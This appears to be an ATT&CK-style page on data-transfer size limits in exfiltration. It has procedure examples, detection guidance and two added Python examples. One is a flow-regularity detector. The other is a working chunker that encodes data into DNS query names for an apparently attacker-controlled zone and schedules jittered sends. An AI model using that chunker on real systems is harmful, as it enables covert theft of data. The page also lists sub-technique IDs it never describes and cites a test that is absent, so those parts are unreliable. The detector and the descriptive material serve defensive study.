Data Transfer Size Limits

Data transfer size limits refers to an adversary controlling the amount of data sent in any single transfer in order to evade detection, typically by splitting stolen data into fragments that stay below the thresholds network monitoring applies. Traditional detection relies on anomalous flow features (for example a client that keeps sending packets of identical size), on protocol conformance checks (such as non-standard fragmentation), and on identifying unusual network connections. Defenders need to combine traffic baselining, deep protocol parsing and endpoint behaviour monitoring into a layered detection capability.

To counter these traditional detection mechanisms, adversaries have developed newer trace-hiding techniques that combine abuse of protocol features, hijacking of cloud services and encrypted chunking. By decomposing the exfiltration into small operations that look like routine business activity, they achieve covert transfer in which a legitimate form carries an illegitimate purpose.

The current evolution of size-limited exfiltration centres on adapting the transport to its environment and reshaping its behaviour to look legitimate. Encrypted chunked transfer uses cryptography to remove any observable relationship between data blocks, disguising the exfiltration as a steady stream of ordinary business interactions. In-protocol fragmentation binds the chunks to the fragmentation mechanisms of the standard protocol stack, so the malicious fragments are legitimate at the protocol-specification level. Cloud storage multipart upload exploits the trust placed in cloud platform infrastructure, turning the leak into a sequence of compliant API calls. The three share one property: they step outside the traditional network-layer contest. By making the transfer granular, protocol-conformant and service-based, every individual transfer event has a plausible business rationale, while the overall leak is low-rate, long-lived and distributed, which defences built on single-point detection or short-window traffic analysis struggle to perceive.

These trace-hiding techniques force defenders to build a combined defence spanning cross-protocol parsing, cloud environment monitoring and user behaviour analytics. Metadata analysis of encrypted traffic, tracing of cloud API call chains and long-term correlation of data flows are needed to gain full visibility of covert transfers and block them precisely.

ID: T1030
Sub-techniques: T1030.001, T1030.002, T1030.003
Tactic: Exfiltration
Platforms: Linux, Windows, macOS
Version: 1.0
Created: 31 May 2017
Last Modified: 14 July 2020

Trace-hiding effects

Effect type Present
Signature disguise
Behaviour transparency
Data obscuring
Spatio-temporal trace dilution

Signature disguise

By adapting closely to protocol specifications, the adversary disguises chunked transfers as standard protocol operations (HTTP resumable transfers via range requests, TCP segment retransmission), relying on the protocol's own fault-tolerance mechanisms to hide the reassembly logic. Using official cloud service APIs as the carrier likewise makes the transport legitimate, so the chunking pattern closely resembles normal business traffic and evades detection based on protocol anomalies.

Data obscuring

Each chunk is encrypted independently end to end and then sent over an already-encrypted channel such as HTTPS or SFTP, hiding both the chunk contents and the relationship between chunks. Cloud multipart upload adds the provider's transport-layer encryption on top, a double layer that defeats deep content inspection. What independent encryption does not hide is the chunk size and timing, which is why the detections below focus on flow metadata rather than payload content.

Spatio-temporal trace dilution

The complete data set is split into small increments transferred over a long period, with dynamically adjusted intervals (for example aligning transfers with the target organisation's working hours), so that the exfiltration is diluted into the timeline of normal business traffic. In cloud storage scenarios, multi-region distributed storage further scatters the data traces spatially, making global forensic reconstruction harder for the defender.
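The in-protocol fragmentation variant described above, taken to the DNS case that several procedure examples below describe (Helminth, Kessel and Kevin all size chunks to fit inside DNS query names), as an added example written for this page rather than code from any of those samples. It splits data into base32 labels within the RFC 1035 limits of 63 octets per label and 253 characters per name, prefixes each query with a sequence label so the receiver can reassemble out-of-order or duplicated queries, provides the fixed-size and random-size splitters the procedure examples mention, and computes the jittered send schedule that the trace-dilution effect relies on. The zone name, sequence-label width, sample payload and timing bounds are assumptions of the example.

```python
"""Added example: protocol-bound chunking for DNS-carried exfiltration,
receiver-side reassembly and a jittered send schedule. Not code from the
original page or from any sample it lists; zone name, label layout, sample
payload and timing bounds are assumptions of this example."""
import base64
import math
import random

# DNS limits from RFC 1035: at most 63 octets per label and 253 characters
# for a full name in presentation form.
MAX_LABEL = 63
MAX_NAME = 253
# base32 turns 5 raw bytes into 8 characters; keeping whole 5-byte groups
# means every full label decodes without padding: 35 bytes -> 56 chars.
RAW_PER_LABEL = (MAX_LABEL // 8) * 5


def split_sizes(data: bytes, lo: int, hi: int, seed: int = 1) -> list[bytes]:
    """Split data into parts whose sizes fall in [lo, hi]. lo == hi gives the
    fixed-size chunks of the APT28 / C0026 style; lo < hi gives random-size
    parts of the LunarWeb style. The final part may be shorter than lo."""
    rng = random.Random(seed)
    parts, pos = [], 0
    while pos < len(data):
        n = rng.randint(lo, hi)
        parts.append(data[pos:pos + n])
        pos += n
    return parts


def chunk_for_dns(data: bytes, zone: str, labels_per_query: int = 2,
                  seq_width: int = 4) -> list[str]:
    """Encode data as query names '<seq>.<label>[.<label>].<zone>'. Each
    query carries up to labels_per_query * RAW_PER_LABEL raw bytes; the hex
    sequence label lets the receiver restore order."""
    per_query = labels_per_query * RAW_PER_LABEL
    names = []
    for seq in range(math.ceil(len(data) / per_query)):
        piece = data[seq * per_query:(seq + 1) * per_query]
        labels = []
        for i in range(0, len(piece), RAW_PER_LABEL):
            enc = base64.b32encode(piece[i:i + RAW_PER_LABEL]).decode()
            labels.append(enc.rstrip("=").lower())  # DNS is case-insensitive
        name = f"{seq:0{seq_width}x}." + ".".join(labels) + "." + zone
        if len(name) > MAX_NAME or any(len(lab) > MAX_LABEL for lab in labels):
            raise ValueError("query name exceeds DNS limits")
        names.append(name)
    return names


def reassemble(names: list[str], zone: str) -> bytes:
    """Decode received query names back into the original bytes. Queries may
    arrive out of order or duplicated through resolver caches, so ordering
    comes from the sequence label, not from arrival order."""
    suffix = "." + zone
    parts = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        seq_label, *labels = name[:-len(suffix)].split(".")
        raw = b""
        for lab in labels:
            enc = lab.upper()
            enc += "=" * (-len(enc) % 8)  # restore stripped base32 padding
            raw += base64.b32decode(enc)
        parts[int(seq_label, 16)] = raw
    return b"".join(parts[i] for i in sorted(parts))


def send_schedule(n_queries: int, min_gap: float, max_gap: float,
                  seed: int = 1) -> list[float]:
    """Cumulative send offsets in seconds with uniform jitter between
    queries: the low-rate, long-period pattern the page describes, computed
    rather than slept so the example runs instantly."""
    rng = random.Random(seed)
    t, offsets = 0.0, []
    for _ in range(n_queries):
        t += rng.uniform(min_gap, max_gap)
        offsets.append(t)
    return offsets


if __name__ == "__main__":
    payload = bytes(range(256)) * 3          # constructed 768-byte sample
    zone = "cdn-updates.example.com"        # assumed attacker-controlled zone
    queries = chunk_for_dns(payload, zone)
    print(len(queries), "queries, first:", queries[0][:40] + "...")
    random.Random(3).shuffle(queries)       # simulate out-of-order arrival
    assert reassemble(queries, zone) == payload
    print("schedule span (s):", round(send_schedule(len(queries), 30, 90)[-1], 1))
```

Each query here carries 70 raw bytes, so a 1 MB archive needs roughly 15,000 queries; with 30 to 90 second gaps that is about ten days of traffic, which is the scale of dilution the page refers to. The sequence label is what makes the receiver robust to resolver reordering and caching, and it is also an observable: a defender decoding queries to one zone will see a monotonically increasing first label.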

Procedure Examples

ID Name Description
S0622 AppleSeed

AppleSeed has divided files if the size is 0x1000000 bytes (16 MiB) or more.[1]

G0007 APT28

APT28 has split archived exfiltration files into chunks smaller than 1MB.[2]

G0096 APT41

APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.[3]

C0015 C0015

During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.[4]

C0026 C0026

During C0026, the threat actors split encrypted archives containing stolen files and information into 3MB parts prior to exfiltration.[5]

S0030 Carbanak

Carbanak exfiltrates data in compressed chunks if a message is larger than 4096 bytes.[6]

S0154 Cobalt Strike

Cobalt Strike will break large data sets into smaller chunks for exfiltration.[7]

S0170 Helminth

Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.[8]

S0487 Kessel

Kessel can split the data to be exfiltrated into chunks that will fit in subdomains of DNS queries.[9]

S1020 Kevin

Kevin can exfiltrate data to the C2 server in 27-character chunks.[10]

G1014 LuminousMoth

LuminousMoth has split archived files into multiple parts to bypass a 5MB limit.[11]

S1141 LunarWeb

LunarWeb can split exfiltrated data that exceeds 1.33 MB in size into multiple random sized parts between 384 and 512 KB.[12]

S0699 Mythic

Mythic supports custom chunk sizes used to upload/download files.[13]

S0644 ObliqueRAT

ObliqueRAT can break large files of interest into smaller chunks to prepare them for exfiltration.[14]

S0264 OopsIE

OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks.[15]

G1040 Play

Play has split victims' files into chunks for exfiltration.[16][17]

S0150 POSHSPY

POSHSPY uploads data in 2048-byte chunks.[18]

S1040 Rclone

The Rclone "chunker" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.[19][4]

S0495 RDAT

RDAT can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. RDAT can also download data from the C2 which is split into 81,920-byte portions.[20]

G0027 Threat Group-3390

Threat Group-3390 actors have split RAR files for exfiltration into parts.[21]

Mitigations

ID Mitigation Description
M1031 Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.

Detection

ID Data Source Data Component Detects
DS0029 Network Traffic Network Connection Creation

Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows (e.g. unusual network communications or suspicious communications sending fixed size data packets at regular intervals as well as unusually long connection patterns). Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, protocol port mismatch, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated

Network Traffic Flow

Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
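The "fixed size data packets at regular intervals" and "unusually long connection patterns" signals from the detection rows above, implemented over constructed flow records as an added example (not code from the original page or from any detection product). It groups connections by source, destination and port, computes the coefficient of variation of outbound bytes and of inter-connection gaps, and flags tuples that are near-constant in size, regular in timing and persist beyond a minimum duration. The sample hosts, the thresholds and the 1500-byte, 60-second beacon (modelled on the OopsIE procedure example) are assumptions.

```python
"""Added example: a size-and-interval regularity detector for throttled
exfiltration, run over constructed flow records. Not code from the original
page; thresholds, sample hosts and the beacon pattern are assumptions."""
import random
import statistics
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Flow:
    ts: float        # connection start, epoch seconds
    src: str
    dst: str
    dport: int
    out_bytes: int   # bytes sent by src in this connection


def make_sample_flows(seed: int = 7) -> list[Flow]:
    """Constructed data: 10.0.0.5 sends 1500 bytes to one host every ~60 s
    for four hours; 10.0.0.6 is an ordinary client with varied sizes and
    bursty (exponential) timing to the same kind of destination."""
    rng = random.Random(seed)
    t0 = 1_700_000_000.0
    flows = [Flow(t0 + i * 60 + rng.uniform(-1, 1), "10.0.0.5", "203.0.113.10", 443, 1500)
             for i in range(240)]
    t = t0
    for _ in range(240):
        t += rng.expovariate(1 / 60)
        flows.append(Flow(t, "10.0.0.6", "203.0.113.20", 443, rng.randint(200, 60000)))
    return flows


def _cv(values: list[float]) -> float:
    """Coefficient of variation (stddev / mean); 0 for a constant series."""
    m = statistics.mean(values)
    return statistics.pstdev(values) / m if m else 0.0


def find_throttled_transfers(flows: list[Flow], min_count: int = 20,
                             max_size_cv: float = 0.05, max_gap_cv: float = 0.25,
                             min_duration: float = 3600) -> list[dict]:
    """Flag (src, dst, dport) tuples whose outbound sizes are near-constant,
    whose inter-connection gaps are regular, and which persist for at least
    min_duration seconds. Returns one finding dict per flagged tuple."""
    groups = defaultdict(list)
    for f in flows:
        groups[(f.src, f.dst, f.dport)].append(f)
    findings = []
    for (src, dst, dport), fs in groups.items():
        if len(fs) < min_count:
            continue
        fs.sort(key=lambda f: f.ts)
        sizes = [f.out_bytes for f in fs]
        gaps = [b.ts - a.ts for a, b in zip(fs, fs[1:])]
        duration = fs[-1].ts - fs[0].ts
        size_cv, gap_cv = _cv(sizes), _cv(gaps)
        if size_cv <= max_size_cv and gap_cv <= max_gap_cv and duration >= min_duration:
            findings.append({
                "src": src, "dst": dst, "dport": dport, "count": len(fs),
                "bytes": sum(sizes), "size_cv": round(size_cv, 3),
                "gap_cv": round(gap_cv, 3), "duration_s": round(duration),
            })
    return findings


if __name__ == "__main__":
    for hit in find_throttled_transfers(make_sample_flows()):
        print(hit)
```

The caveat a practitioner will want: a sender that randomises chunk sizes (the LunarWeb 384 to 512 KB case) or jitters its intervals widely pushes both coefficients above the thresholds, so this rule should sit beside a per-host outbound byte baseline over days rather than hours, which is what the long-period correlation described earlier on this page is for. Tune min_duration to the dwell time you expect to catch; the test below shows that raising it above the beacon's four-hour span suppresses the finding.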

References